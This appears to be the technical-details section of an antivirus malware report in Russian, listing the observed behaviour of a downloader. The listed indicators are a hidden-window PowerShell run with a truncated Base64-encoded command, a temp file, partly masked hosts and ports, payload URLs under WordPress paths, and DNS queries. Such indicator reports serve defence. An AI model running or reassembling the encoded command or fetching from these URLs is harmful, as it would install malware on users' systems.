Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFAGgAZQBmADUAOQBpAD0AKAAoACcAWgAnACsAJwBzADUAJwApACsAJwAwACcAKwAoACcAZAA1ACcAKwAnAGIAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\899610.cvr
- 'fi###jshoes.com':80
- 'rt###oring.com':80
- 'bl###kysol.com':80
- 'bl###kysol.com':443
- 'cr###boxs.com':80
- 'hu###omains.com':443
- http://www.fi###jshoes.com/wp-admin/RgaiT/
- http://www.rt###oring.com/wp-includes/LlbY6o/
- http://www.rt###oring.com/wp-includes/LlbY6o/1
- http://bl###kysol.com/sys-cache/2Rk/
- http://www.bl###kysol.com/sys-cache/2Rk/
- http://cr###boxs.com/cgi-bin/IaJ/
- http://www.pa########leducationguidelines.com/wp-admin/3jXU5Bp/
- http://www.pa########leducationguidelines.com/wp-admin/3jXU5Bp/1
- 'bl###kysol.com':443
- 'hu###omains.com':443
- DNS ASK fi###jshoes.com
- DNS ASK fa###ead.com
- DNS ASK rt###oring.com
- DNS ASK bl###kysol.com
- DNS ASK cr###boxs.com
- DNS ASK hu###omains.com
- DNS ASK pa########leducationguidelines.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFAGgAZQBmADUAOQBpAD0AKAAoACcAWgAnACsAJwBzADUAJwApACsAJwAwACcAKwAoACcAZAA1ACcAKwAnAGIAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcw...' (со скрытым окном)